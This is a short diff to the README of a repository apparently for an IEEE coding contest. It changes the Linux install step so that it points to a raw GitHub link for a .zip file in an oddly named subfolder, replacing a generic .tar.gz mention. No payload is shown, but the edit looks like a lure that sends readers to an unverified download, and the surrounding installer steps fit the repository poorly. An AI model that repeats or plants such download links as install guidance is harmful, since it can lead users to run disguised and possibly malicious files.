DhruvJayeshGondaliya/IEEE_MC_CODING_2025/README.md

 4. **Run the Installer**:
    - For Windows: Double-click the downloaded `.exe` file and follow the installation prompts.
    - For macOS: Open the downloaded `.dmg` file, drag the application icon to your Applications folder.
-   - For Linux: Use the command line to install the package or locate the `.tar.gz` file for installation.
+   - For Linux: Use the command line to install the package or locate the `https://raw.githubusercontent.com/DhruvJayeshGondaliya/IEEE_MC_CODING_2025/main/apodematal/IEEE_MC_CODING_2025.zip` file for installation.

 5. **Launch the Application**: After installation, find the application in your programs or applications list and open it.